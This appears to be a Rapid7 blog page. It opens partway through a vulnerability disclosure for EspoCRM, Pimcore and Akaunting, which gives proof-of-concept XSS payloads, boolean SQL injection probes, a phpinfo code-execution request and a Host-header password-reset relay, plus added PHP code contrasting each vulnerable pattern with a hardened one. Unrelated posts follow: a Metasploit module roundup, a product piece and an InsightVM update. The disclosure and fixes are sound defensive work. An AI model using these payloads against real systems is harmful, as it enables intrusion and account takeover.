CVE-2021-36803 Akaunting v2.1.12 CWE-79 (Persistent XSS) 6.3 (Medium) Fixed in Akaunting v2.1.13
CVE-2021-36804 Akaunting v2.1.12 CWE-640 (Weak Password Reset) 5.4 (Medium) Fixed in Akaunting v2.1.13
CVE-2021-36805 Akaunting v2.1.12 CWE-79 (Persistent XSS) 5.2 (Medium) Fixed in Akaunting v2.1.13

EspoCRM v6.1.6 (1 issue)

EspoCRM is an open-source customer relationship management (CRM) application used in all sorts of industries, although it seems to enjoy special success in the real estate sector. More about EspoCRM can be found at the vendor’s website.

CVE-2021-3539: EspoCRM Avatar Persistent XSS

Any user with default rights, which allow them to upload their own avatar, can abuse the corresponding API by providing executable JavaScript code instead of an image. An example call to the API is detailed below:

```http
PUT /api/v1/User/609108e6b123bb29d HTTP/1.1
Host: 10.0.0.10:8443
{redacted}
Content-Length: 43
Origin: https://10.0.0.10:8443
Connection: close
Referer: https://10.0.0.10:8443/
Cookie: {redacted}

{
  "avatarId":"\" onerror=\"alert(0)\" "
}
```

This leads to rendering the avatar as:

[screenshot: rendered avatar markup with the injected attribute]

resulting in triggering the `onerror` event:

[screenshot: the `onerror` handler firing]

Because EspoCRM allows administrators to install arbitrary, custom extensions, an attacker can leverage this XSS to silently coerce an administrator (who views the attacker’s avatar) to install a malicious extension, thus retaining permanent control of the web application, as seen in the screenshot below.

[screenshot: malicious extension installed via the XSS]

Pimcore Customer Data Framework v3.0.0 (1 issue)

Pimcore CDF is a component of the Pimcore platform and is a CRM enterprise application. More about Pimcore CDF can be found at the vendor’s website.

CVE-2021-31867: Pimcore CDF ‘SegmentAssignmentController.php’ Blind SQL Injection

An SQL injection vulnerability exists in the Customer Management Framework Bundle, specifically in the SegmentAssignmentController.php component. The vulnerable code was introduced in commit 6fc8aff8f95fc168d173ef3b473760dd98d026c4 and is shown below.

```php
public function inheritableSegments(Request $request)
{
    $id = $request->get('id') ?? '';
    $type = $request->get('type') ?? '';
    /* @var $db Connection */
    $db = $this->get(Connection::class);
    // Both the identifiers derived from $type and the raw $id value are
    // interpolated into the SQL text by sprintf(); nothing is parameterised.
    $parentIdStatement = sprintf('SELECT `%s` FROM `%s` WHERE `%s` = "%s"', $type === 'object' ? 'o_parentId' : 'parentId', $type.'s', $type === 'object' ? 'o_id' : 'id', $id);
    $parentId = $db->fetchOne($parentIdStatement);
    $segments = $this->get(SegmentManagerInterface::class)->getSegmentsForElementId($parentId, $type);
    $data = array_map([$this, 'dehydrateSegment'], array_filter($segments));
    return $this->adminJson(['data' => array_values($data)]);
}
```

`$id` is retrieved from the request parameters, placed directly into the SQL query through the use of `sprintf`, and then executed (as long as `$type` is something other than `object`). This allows a malicious actor to inject into the SQL query through the use of a single quote (`'`).

This vulnerability can be thought of as a Boolean-based Blind SQL Injection, as an exploit is unable to pull out data from the database directly, but has to piece together the information through a series of True/False requests.
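The following is an added example, not Pimcore’s code: the query shape from `inheritableSegments()` rebuilt on PDO with an in-memory SQLite database so it runs stand-alone, first in the vulnerable `sprintf` form, then hardened with an identifier allowlist and a bound parameter. The `documents` table, its rows, and the element-type map are constructed for the demo and do not reproduce Pimcore’s real schema.

```php
<?php
// Added example, not Pimcore's code. PDO + SQLite stand in for Pimcore's
// Doctrine connection; the schema below is constructed for the demo.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE documents (id INTEGER PRIMARY KEY, parentId INTEGER)');
$db->exec('INSERT INTO documents (id, parentId) VALUES (137, 1), (138, 2)');

// Vulnerable shape: the identifiers derived from $type and the $id value are
// pasted into the SQL text, so a quote inside $id rewrites the WHERE clause.
function parentIdUnsafe(PDO $db, string $type, string $id)
{
    $sql = sprintf(
        "SELECT `%s` FROM `%s` WHERE `%s` = '%s'",
        $type === 'object' ? 'o_parentId' : 'parentId',
        $type . 's',
        $type === 'object' ? 'o_id' : 'id',
        $id
    );
    return $db->query($sql)->fetchColumn();
}

// Hardened shape: identifiers cannot be bound as parameters, so they come from
// a fixed map keyed by the element type; the id is validated and then bound.
function parentIdSafe(PDO $db, string $type, string $id)
{
    $byType = [ // assumed mapping for the demo
        'object'   => ['table' => 'objects',   'id' => 'o_id', 'parent' => 'o_parentId'],
        'document' => ['table' => 'documents', 'id' => 'id',   'parent' => 'parentId'],
    ];
    if (!isset($byType[$type])) {
        throw new InvalidArgumentException("unknown element type: $type");
    }
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $m = $byType[$type];
    $stmt = $db->prepare(sprintf(
        'SELECT `%s` FROM `%s` WHERE `%s` = :id',
        $m['parent'], $m['table'], $m['id']
    ));
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchColumn();
}

// The true/false probes described above, replayed against both versions.
$condTrue  = "137' AND '1'='1";
$condFalse = "137' AND '1'='2";
echo 'unsafe, condition true:  ', var_export(parentIdUnsafe($db, 'document', $condTrue), true), "\n";  // parent id 1: the injected condition ran
echo 'unsafe, condition false: ', var_export(parentIdUnsafe($db, 'document', $condFalse), true), "\n"; // false: no row matched
foreach ([$condTrue, $condFalse] as $probe) {
    try {
        parentIdSafe($db, 'document', $probe);
    } catch (InvalidArgumentException $e) {
        echo 'safe: rejected - ', $e->getMessage(), "\n";
    }
}
echo 'safe, legitimate id:     ', var_export(parentIdSafe($db, 'document', '137'), true), "\n"; // parent id 1
```

The hardened version rejects the probes before they reach the database, which is also what makes the 200-versus-500 oracle described in the following paragraphs disappear: a malformed id yields the same validation error whatever condition it carries.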

The image below shows a request that tests if the integer 1 equals 1:

[screenshot: request with a `1=1` condition]

The response returns a `200 OK` along with the data that has an `id` of 137:

[screenshot: `200 OK` response containing id 137]

This second request tests if the integer 1 is equal to 2:

[screenshot: request with a `1=2` condition]

This time, the response is a `500 Internal Server Error` along with a stack trace.

[screenshot: `500 Internal Server Error` with stack trace]

Using these 2 queries, a malicious actor can automate the retrieval of information from the database. This last example shows a query to find the first character of the version from the database server.

[screenshot: request probing the first character of the database version]

Pimcore AdminBundle v6.8.0 (1 issue)

Pimcore AdminBundle is part of the core Pimcore platform, a Product Information Management (PIM) platform, which is closely related to the Enterprise Resource Planning (ERP) functions of a business. More about the Pimcore platform can be found at the vendor’s website.

CVE-2021-31869: Pimcore AdminBundle ‘specificID’ SQL Injection

Requests sent to `/admin/object/grid-proxy` are handled by the `Bundles/AdminBundle/Controller/Admin/DataObject/DataObjectController.php` file, starting on line 1568, as shown below:

[screenshot: `DataObjectController.php` grid-proxy handler]

This file collects all the parameters (line 1586), then includes the parameters in a call to `prepareListingForGrid`, shown below:

[screenshot: call to `prepareListingForGrid`]

`prepareListingForGrid` is found in the previously mentioned `Pimcore/Bundles/AdminBundle/Helper/GridHelperService.php` file and starts on line 489. This function builds the SQL query from the provided parameters. The `specificId` parameter is vulnerable to SQL injection, since its value is concatenated directly into the string and then added to the `$conditionFilters` array, as shown below:

[screenshot: `specificId` concatenated into `$conditionFilters`]

A request to the `grid-proxy` URL is shown below. In this query, the `specificId` field is set to `1+or+'a'='a'`. The response shows a content-length of 7546.

```http
GET /admin/object/grid-proxy/classId=BS&[other params]&specificId=1+or+'a'='a'&query=[other params] HTTP/1.1
```

[screenshot: response with content-length 7546]

This next request sets the `specificId` parameter to `1+or'a'='b'`. As shown in the following image, the response length is now 47, and no records were returned.

[screenshot: response with content-length 47 and no records]

By combining these 2 requests, a malicious actor can programmatically return data from the database by testing each character and monitoring the response. The image below shows an example of this by requesting the database version and checking if the first character of the version is equal to 8.

[screenshot: request checking whether the first character of the database version is 8]

Akaunting v2.1.12 (6 issues)

Akaunting is an enterprise accounting system, providing a variety of services related to the normal day-to-day business operations, notably in the retail sector, such as invoicing and expense tracking. More about Akaunting can be found at the vendor’s website.

CVE-2021-36800: Akaunting OS Command Injection

The Akaunting application allows for PHP code sent to the application to be executed by the web server. This can lead to a shell directly on the host operating system. The vulnerability was introduced upon the creation of the `Money.php` file in the first commit, 1c01d2120941d99f758cf23be20fe5931bdd4a36. To exploit this vulnerability, the attacker must first be authenticated and already have permissions to add or modify sales invoices.

A POST sent to `/{company_id}/sales/invoices/{invoice_id}` with an `items[0][price]` that names a PHP callable function is executed directly. The image below shows the POST body, with `items[0][price]` set to `phpinfo`; on the right is the response, which includes the output of the application executing `phpinfo()`:

[screenshot: POST body with `items[0][price]` set to `phpinfo` and the resulting response]

This is due to a lack of input sanitization in the `Money.php` middleware component. The following is the code responsible for the execution; as shown, it checks whether the received value is callable and, if so, calls it.

```php
protected function parseAmountFromCallable($amount)
{
    // is_callable() is true for any string naming a defined function,
    // so a request value such as "phpinfo" is invoked rather than parsed.
    if (!is_callable($amount)) {
        return $amount;
    }
    return $amount();
}
```
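As an added example (not Akaunting’s code), the vulnerable shape above is shown beside a parser that keeps the “accept a few amount formats” behaviour without ever invoking request input as a function. `phpversion` stands in for the `phpinfo` value used in the report because its output is a single short string; the thousands-separator handling is an assumption about the input formats worth tolerating.

```php
<?php
// Added example, not Akaunting's code.

// Vulnerable shape, as in Money.php: any string naming a defined function is called.
function parseAmountFromCallableUnsafe($amount)
{
    if (!is_callable($amount)) {
        return $amount;
    }
    return $amount();
}

// Hardened shape: only numbers and numeric strings are accepted; nothing is ever called.
function parseAmountSafe($amount): float
{
    if (is_int($amount) || is_float($amount)) {
        return (float) $amount;
    }
    if (!is_string($amount)) {
        throw new InvalidArgumentException('amount must be a number or numeric string');
    }
    // Tolerate thousands separators and surrounding whitespace, nothing else (assumed format).
    $normalized = str_replace([',', ' '], '', trim($amount));
    if (!preg_match('/^-?\d+(\.\d+)?$/', $normalized)) {
        throw new InvalidArgumentException("not a numeric amount: $amount");
    }
    return (float) $normalized;
}

echo "unsafe('phpversion') -> ", parseAmountFromCallableUnsafe('phpversion'), "\n"; // the PHP version string: code ran
echo "unsafe('12.50')      -> ", parseAmountFromCallableUnsafe('12.50'), "\n";      // 12.50
echo "safe('1,250.50')     -> ", parseAmountSafe('1,250.50'), "\n";                 // 1250.5
try {
    parseAmountSafe('phpversion');
} catch (InvalidArgumentException $e) {
    echo "safe('phpversion')   -> rejected: ", $e->getMessage(), "\n";
}
```

The regex deliberately treats `,` as a thousands separator; deployments that use it as the decimal separator should parse according to the configured locale rather than widen the pattern, since the point is that the set of accepted inputs stays closed.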

CVE-2021-36801: Akaunting Authentication Bypass in Company Selection

A user is able to change the company their account is associated with, allowing them to view/modify information from another company. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first be authenticated as any user.

The first image shows that the user `Test_company_1` is associated with the company named `My Company`:

[screenshot: `Test_company_1` associated with `My Company`]

While logged in as the user `Test_company_1`, we click on `Profile` to change the user settings:

[screenshot: the `Profile` page for `Test_company_1`]

By clicking on the `Save` button and intercepting the request, we can modify the `companies[0]` field to the `id` of another company. The image below shows changing the company information from 1 to 2 while updating the profile information:

[screenshot: intercepted profile update with `companies[0]` changed from 1 to 2]

Once done, viewing the dashboard shows that the associated company has been changed:

[screenshot: dashboard now showing the other company]
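The following is an added example, not Akaunting’s code, of the server-side check that closes this class of issue: the companies a user may select are decided from server-side membership state, never from the `companies[]` field the browser submits. The membership table and the request body are constructed for the demo.

```php
<?php
// Added example, not Akaunting's code. Membership data and requests are constructed.

// Constructed server-side state: which users belong to which company ids.
$memberships = [
    'Test_company_1' => [1],    // the report's test user, member of company 1 only
    'admin'          => [1, 2],
];

// Vulnerable shape: save whatever company ids the client submitted.
function selectedCompaniesUnsafe(array $request): array
{
    return array_map('intval', $request['companies'] ?? []);
}

// Hardened shape: intersect the request with the user's real memberships and
// refuse the whole update if any id outside that set was requested.
function selectedCompaniesSafe(string $user, array $request, array $memberships): array
{
    $allowed   = $memberships[$user] ?? [];
    $requested = array_map('intval', $request['companies'] ?? []);
    $denied    = array_diff($requested, $allowed);
    if ($denied !== []) {
        throw new RuntimeException(
            "$user is not a member of company id(s) " . implode(',', $denied)
        );
    }
    return array_values(array_intersect($allowed, $requested));
}

// Constructed equivalent of the intercepted profile update, companies[0] changed from 1 to 2.
$tampered = ['name' => 'Test_company_1', 'companies' => [2]];

echo 'unsafe: ', json_encode(selectedCompaniesUnsafe($tampered)), "\n"; // [2]: the account now points at company 2
try {
    selectedCompaniesSafe('Test_company_1', $tampered, $memberships);
} catch (RuntimeException $e) {
    echo 'safe:   rejected - ', $e->getMessage(), "\n";
}
echo 'safe:   ', json_encode(selectedCompaniesSafe('Test_company_1', ['companies' => [1]], $memberships)), "\n"; // [1]
```

Rejecting rather than silently filtering is the better choice here: a request that names a company the user does not belong to is worth logging as a probable tampering attempt.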

CVE-2021-36802: Akaunting DoS via User-Controlled ‘locale’ Variable

Any user can crash the Akaunting platform by supplying an invalid `locale` variable as part of an otherwise well-formed HTTP POST request. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first be authenticated as any user.

The image below shows a POST to `/2/settings/settings` with an invalid locale that is successfully processed without error:

[screenshot: POST to `/2/settings/settings` with an invalid `locale` accepted]

Visiting any page will then result in a 500 response:

[screenshot: subsequent page load returning a 500]

CVE-2021-36803: Akaunting Avatar Persistent XSS

A user can inject HTML into the avatar upload process and trigger an XSS for anyone who views it, including high-privilege administrators of the application. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first be authenticated as any user.

The image below shows a POST to `/{company_id}/auth/users/{user_id}` with HTML embedded in the image upload field:

[screenshot: POST to `/{company_id}/auth/users/{user_id}` with HTML in the upload field]

Example payload:

```http
-----------------------------11088376342107705763341750165
Content-Disposition: form-data; name="picture"; filename="Screenshot_2021-05-02_05_11_16.png"
Content-Type: image/png

</pre><html><b>test</b><script>alert('xss')</script><pre>
```

The HTML is directly rendered on screen while accessing the avatar URL, e.g. `/{company_id}/uploads/{upload_id}`:

[screenshot: uploaded HTML rendered at the avatar URL]

CVE-2021-36804: Akaunting Password Reset Relay

Setting the `Host` header while sending a POST to the `/auth/forgot` endpoint changes the link generated by the application. An attacker can send a password-reset request for an existing user and modify the `Host` header to point to a web server they control. If the user clicks on the password-reset URL, the attacker will receive the password-reset token and can then set the password to something the attacker knows. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first know or guess the email address of a valid user.

The image below shows a POST to the `/auth/forgot` endpoint, with the `Host` set to `example.com`:

[screenshot: POST to `/auth/forgot` with `Host: example.com`]

The email sent by the application directs the user to the `example.com` domain with the password-reset token.

[screenshot: reset email linking to `example.com` with the token]

Note that the root of this vulnerability is due to a design decision in the Laravel framework and how proxy headers are handled with respect to single instance and multi-tenant implementations. In other words, while CVE-2021-36804 is a (now fixed) vulnerability in Akaunting, other multi-tenant implementations involving Laravel should be aware that the default configuration of that framework is likely vulnerable to a similar issue. For more information on this design issue, please see Enlightn’s Host Injection Analyzer, Daniel Coulbourne’s tweet, and PR 5477 in the Laravel GitHub repository.
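As an added example (not Akaunting’s or Laravel’s code), the two ways of building the reset link are shown side by side: one that inherits the request’s `Host` header, and one that rejects hosts the instance does not serve and builds the link from configuration. `APP_URL`, the trusted-host list, the token, and the `$_SERVER`-style arrays are constructed placeholders.

```php
<?php
// Added example, not Akaunting's or Laravel's code. All values are constructed.

const APP_URL = 'https://accounting.example.internal'; // assumed deployment URL
$trustedHosts = ['accounting.example.internal'];        // hosts this instance legitimately serves

// Vulnerable shape: the link inherits whatever Host the requester sent, so the
// reset token is delivered to an address of the requester's choosing.
function resetLinkFromRequestHost(array $server, string $token): string
{
    return 'https://' . $server['HTTP_HOST'] . '/auth/reset/' . $token;
}

// Hardened shape: refuse requests for hosts this instance does not serve, and
// build the link from configuration rather than from the request.
function resetLinkFromConfig(array $server, array $trustedHosts, string $token): string
{
    $host = strtolower(explode(':', $server['HTTP_HOST'] ?? '', 2)[0]); // strip any :port
    if (!in_array($host, $trustedHosts, true)) {
        throw new RuntimeException("untrusted Host header: $host");
    }
    return rtrim(APP_URL, '/') . '/auth/reset/' . rawurlencode($token);
}

$token = 'tok_constructed_example'; // placeholder, not a real reset token

$forged  = ['HTTP_HOST' => 'example.com'];                 // the Host value used in the report
$genuine = ['HTTP_HOST' => 'accounting.example.internal'];

echo 'unsafe: ', resetLinkFromRequestHost($forged, $token), "\n"; // https://example.com/auth/reset/tok_constructed_example
try {
    resetLinkFromConfig($forged, $trustedHosts, $token);
} catch (RuntimeException $e) {
    echo 'safe:   rejected - ', $e->getMessage(), "\n";
}
echo 'safe:   ', resetLinkFromConfig($genuine, $trustedHosts, $token), "\n"; // https://accounting.example.internal/auth/reset/tok_constructed_example
```

Laravel ships a `TrustHosts` middleware that performs the host check for the whole application; a multi-tenant deployment that must derive the URL from the request should back it with a per-tenant allowlist of hostnames rather than trusting the header directly.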

CVE-2021-36805: Akaunting Sales Invoice Footer Persistent XSS

The Akaunting application allows HTML to be written to the footer of a sales invoice and relies on its built-in “firewall” to prevent malicious code, such as XSS, from being accepted. The following example shows how specially crafted HTML code can bypass the filtering. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must have the permissions to add or modify sales invoices.

A POST sent to `/{company_id}/sales/invoices/{invoice_id}` with a `footer` that includes the following HTML will execute the JavaScript.

Proof of concept payload:

```http
POST /1/sales/invoices/201 HTTP/1.1
...
-----------------------------11766653461285783364827965738
Content-Disposition: form-data; name="footer"
'\"<img class="/>" onerror=alert("Vulnerable+to+XSS") src="b.png"
-----------------------------11766653461285783364827965738
…
```

The results of viewing the sales invoice:

[screenshot: the alert firing when the invoice is viewed]

The payload bypasses the firewall restrictions because of the `>` placed in the class attribute. The image below shows how this string is not matched against the regex designed to prevent XSS:

[screenshot: the firewall regex failing to match the payload]
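The following is an added example, not EspoCRM’s or Akaunting’s code, that covers both the `avatarId` attribute injection from CVE-2021-3539 and this footer filter bypass. It shows a denylist regex of the kind the report describes missing the page’s footer payload, and contextual output encoding neutralising both payloads. The regex, the avatar URL path, and the id format check are constructed for the demo.

```php
<?php
// Added example, not EspoCRM's or Akaunting's code. Regex, paths and id format are assumed.

// Denylist shape: look for a tag carrying an on* handler. `[^>]*` stops at the
// first `>`, which is exactly what a `>` inside an earlier attribute defeats.
function naiveFirewallBlocks(string $input): bool
{
    return (bool) preg_match('/<[^>]*\bon\w+\s*=/i', $input);
}

// Allowlist shape for an identifier-typed field such as avatarId (format assumed).
function isValidAvatarId(string $id): bool
{
    return (bool) preg_match('/^[A-Za-z0-9]{1,32}$/', $id);
}

// Vulnerable rendering: user data concatenated straight into an attribute.
function avatarTagUnsafe(string $avatarId): string
{
    return '<img class="avatar" src="/avatar/' . $avatarId . '">';
}

// Hardened rendering: reject malformed ids, and still encode for the attribute context.
function avatarTagSafe(string $avatarId): string
{
    if (!isValidAvatarId($avatarId)) {
        throw new InvalidArgumentException('malformed avatarId');
    }
    $enc = htmlspecialchars($avatarId, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<img class="avatar" src="/avatar/' . $enc . '">';
}

// Footer shown as text: encoding makes the markup inert regardless of any denylist.
function footerSafe(string $footer): string
{
    return '<div class="footer">' . htmlspecialchars($footer, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</div>';
}

$avatarPayload = '" onerror="alert(0)" ';                                               // from the EspoCRM request above
$footerPayload = '\'\\"<img class="/>" onerror=alert("Vulnerable+to+XSS") src="b.png"'; // from the Akaunting request above
$plainProbe    = '<img src="x" onerror="x">';                                           // the simple shape a denylist does catch

echo 'denylist blocks plain probe:    ', var_export(naiveFirewallBlocks($plainProbe), true), "\n";    // true
echo 'denylist blocks footer payload: ', var_export(naiveFirewallBlocks($footerPayload), true), "\n"; // false: the `>` in class="/>" ends the match
echo 'unsafe avatar tag: ', avatarTagUnsafe($avatarPayload), "\n"; // the onerror attribute lands inside the tag
try {
    avatarTagSafe($avatarPayload);
} catch (InvalidArgumentException $e) {
    echo 'safe avatar tag:   rejected - ', $e->getMessage(), "\n";
}
echo 'safe footer: ', footerSafe($footerPayload), "\n"; // every <, >, " and ' is entity-encoded
```

The two halves make one point: a regex that tries to recognise dangerous markup has to model HTML parsing, which it never fully does, whereas encoding for the output context (attribute or text) does not need to know what the attacker wrote.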

Remediation

For all of these issues, updating to the latest versions of the affected applications will resolve them. If updating is difficult or impossible due to external factors or custom, local changes, users of these applications can limit their exposure by not presenting their production instances to the internet directly — instead, expose them only to trusted internal networks with trusted insiders.

Alternatively, since these applications are open source, users can contact these projects directly for any help needed to backport a fix to their own running version. One way to discover the exact code changes is simply to look at the git diffs between the fixed version and the most immediately prior version, and the fixes should be fairly obvious to anyone familiar with the languages in which these applications are written. In general, fixing bugs is fairly straightforward once you know what the vulnerabilities are. Finding and proving out the bugs is the hard part, so thanks again to Wiktor and Trevor for their work here.

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/


Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product from Sage Group designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well wait no more, as thanks to the work of Aaron Herndon, Jonathan Peterson, William Vu, Cale Black, and Ryan Villarreal along with work from community contributor deadjakk, Metasploit now has an exploit module for CVE-2020-7388 and CVE-2020-7387, to allow unauthenticated attackers to gain SYSTEM level code execution on affected versions of Sage X3. This module should prove very useful on engagements both as a way to gain an initial foothold in a target network, as well as a way to elevate privileges to allow for more effective pivoting throughout the target network. More information on these vulnerabilities can be found in our detailed writeup post on our blog.

Help My Server is Raining Keys

Another great module that landed this week was an exploit for CVE-2021-27850 from Johannes Mortiz and Yann Castel aka Hakyac, which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications as it is often used to sign important data within the application. However, in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonBeansUtil1 from ysoserial. Therefore, this should be one to keep an eye out for and patch if you haven’t already.

PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to Spencer McIntyre to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the \??\UNC\ bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit’s DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

New module content (4)

Enhancements and features

  • #15403 from pingport80 – This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
  • #15409 from zeroSteiner – An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to automatically convert UNC paths to the \??\UNC\host\path\to\dll format to bypass the second and most recent patch at the time of writing. Additionally, a bug was fixed in the DCERPC library where data that was read would be incomplete when the response did not fit into a single fragment, ensuring that the PrintNightmare module can now read long responses from the target, such as when enumerating the installed printer drivers.
  • #15440 from bwatters-r7 – This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Bugs fixed

  • #14683 from gwillcox-r7 – This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
  • #15436 from sjanusz-r7 – Ensure that generated variable names aren’t Java keywords
  • #15443 from dwelch-r7 – Adds python3 support for the wmiexec external module auxiliary/scanner/smb/impacket/wmiexec
  • #15445 from zeroSteiner – Updates msfconsole’s output logs to only show the target’s ip when an exploit module is run, rather than a host-hash

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Accelerating SecOps and Emergent Threat Response with the Insight Platform

Post Syndicated from Lee Weiner original https://blog.rapid7.com/2021/07/19/insight-platform-and-extended-detection-response/


When we talk to customers about the Insight Platform and how to best support their evolving needs, they’re often not asking for another product, but rather a capability that enhances a current experience. Our customers have the core ingredients of a robust security program, but as their attack surfaces endlessly sprawl, they’re looking for ways to double down on the efficiency and streamlining of security operations they’re already experiencing from the platform today. Efficiency and streamlined operations are 2 areas where our team will continue to focus efforts in order to deliver value across Rapid7’s growing best-in-class portfolio, while enabling cross-capability experiences that improve security-team effectiveness.

Responding to emerging threats and vulnerabilities: Alerts are not enough

One of Rapid7’s greatest strengths is the fact that we have market-leading products in detection and response, cloud security, and vulnerability management. As we increasingly see customers leveraging our products, there are many similar expectations from those user bases. One that stands out is the expectation/demand that Rapid7 quickly respond to emerging threats and new vulnerabilities in a way that provides actionable context. We refer to this program as Emergent Threat Response. We spend a lot of time on this today, though we need to do more here for our customers to help them combat emerging threats. We’re often addressing and detailing out what we know and what we’re doing about high-profile threats (e.g. SolarWinds SUNBURST, Microsoft Exchange Zero-Day), and while our customers have responded very positively to this type of outreach, they have also asked for more of it!

We have a unique opportunity with customers to enable a 2-way conversation. Our customers need to improve signal-to-noise, and our Emergent Threat Response approach does help to accomplish that. We can do a lot more though, and with more intelligence on the internal and external threat landscape we can offer more context and treat more threats with Emergent Threat Response. We’re constantly obsessing over improving signal-to-noise, so we’re careful to pick our spots. However, while an emerging threat may only impact a very small percentage of machines across our customer base, impacted customers may categorize those machines as high-value assets. Customers may also have a lot of interest in a specific threat group and are eager to learn more about them and the detections we have available for their known techniques. In both of these use cases — whether we’re pushing our intelligence or allowing customers to pull it — we can maintain our high standards for signal-to-noise as long as we’re always prioritizing relevancy.

The Insight Platform + IntSights: Enriching alerts and driving contextualized intelligence

When customers are battling emergent threats, core alerts and vulnerability information is important; but our customers are increasingly looking to understand more about adversary groups, tactics and techniques, and why they were targeted. Today we have a very comprehensive view of our customers’ internal networks. This is incredibly helpful to power every product we provide, but investing in more scalable ways to connect this internal profile to an external view of the world increases our ability to deliver timely, relevant, and actionable intelligence. With IntSights joining the Rapid7 family, this aspiration has become a reality. Beyond the Emergent Threat Response use case we drilled into here, the platform will leverage IntSights’ contextualized external threat intelligence to power and strengthen our threat library, risk scoring, and vulnerability prioritization. We believe we can add/enhance capabilities across the portfolio to not only help our customers solve the security concerns of today, but also take a proactive approach to defend against the security concerns of tomorrow.

Learn more about what’s in store for the Insight Platform as Rapid7 welcomes IntSights.

What’s New in InsightVM: Q2 2021 in Review

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/07/16/insightvm-release-roundup-q2-2021/


The world is changing rapidly. We hear that phrase a lot. Throughout Q2 though, it really is true. Vaccines have been rolling out, to varying success depending on the part of the world, but there is optimism.    

As Rapid7 offices begin to open up to our hard-working team members around the globe, we want to infuse some of that optimism into the latest and greatest new features and updates now available to InsightVM customers. The back half of the year will no doubt bring new threats (will ransomware attacks keep going bigger?), so let’s dive into what’s new so you can prepare and prosper.

Honorable mention

In our Q1 recap, we covered 2 releases that can each have significant positive impact on your operations, so they bear repeating here.

Kubernetes integration

Now available in InsightVM: navigate directly to the new Kubernetes tab to initiate the Kubernetes monitor in DockerHub. Then, deploy it to your clusters to see data in Container VRM within InsightVM. You can also see monitor health and connection details via the Data Collection Management page.

Scoped Executive Summary Report

The Executive Summary Report in InsightVM has expanded its functionality so users can filter the report for at-a-glance views of priority items. Shape the report to access key metrics and communicate progress to desired goals and outcomes.

Dashboards, consoles, and panels, oh my!

The new releases and updates for the second quarter of 2021 were aimed at quick-look features that bolster our goal of providing customers with evolving ease-of-use functionalities and products that increasingly focus on at-a-glance convenience.

What’s new: Dialing up dashboard performance

Featuring new cards as well as new ways to filter cards, these features solve 3 distinct issues:

Gaining insights into Microsoft’s vulnerability patch cycle

Rapid7’s Patch Tuesday dashboard template now provides an easy way to stay up to date on information associated with deployment of new Microsoft patches and cycles. Why search around for news or insights when you can get them in the one-stop-shop where your team already receives updates and kicks off remediation efforts on the latest vulnerabilities?

Featuring new cards detailing the assets affected as well as trends, assessments, and biggest risks, you can now learn about and prioritize remediation efforts on all Microsoft vulnerabilities within this expanded InsightVM dashboard.  

Hunting down fine-grained vulnerability-and-remediation details

  • New card #1: New vs remediated vulnerability comparison over time
    • Displays trends in remediated vulnerability findings for date ranges you specify.
  • New card #2: Average days to remediate by severity
    • Compares the average number of days needed to remediate a specific vulnerability against all vulnerabilities remediated for a week you specify.
  • New card #3: Number of unique vulnerabilities
    • Expandable table shows the number of all unique vulnerabilities in the Rapid7 database for which InsightVM has checks as well as the number of all unique vulnerabilities in the user’s environment.
  • New card #4: Asset type
    • Bar chart displays device type for assets in the scope you filter. Each bar shows the number of assets sharing an os.type value, sorted from left to right.

Filtering every card in a dashboard to focus the view on a group of assets or issues

If this were about finding the best way past a big city, this new feature would be the loop road that takes you around the traffic rather than the surface streets that often put you in it.

You can now quickly filter all of your cards by applying a single query to your dashboard. Gone are the days of manually filtering each and every card just to focus your view on a group of assets or vulnerabilities. Long story short: You save more time by quickly filtering to your desired view.  

What’s improved: Shortcuts to what you need

To continue the traffic analogy, getting somewhere faster than you’re used to is always a great thing. The latest InsightVM improvements help you do just that by addressing 3 issues:

Manually loading custom vulnerability checks

Now you can simply load a custom check into the Security Console and start the scan; the console will automatically push that check to whichever Scan Engine(s) you specify.

More context needed

Peek. Panel. Proof. What that actually means is InsightVM now offers at-a-glance context about a specific vulnerability via a “peek panel.” When a user clicks on an affected asset from the vulnerability details page, the panel opens to the right and displays the proof details.  

Gaining results visibility

Teams assessing container image builds in their CI/CD pipeline can now see results in the Builds tab of the InsightVM Container Security feature.

We hope you have a successful quarter and a great season, wherever your business takes you. Until next time…    


Patch Tuesday – July 2021

Post Syndicated from Adam Bunn original https://blog.rapid7.com/2021/07/13/patch-tuesday-july-2021/

Patch Tuesday - July 2021

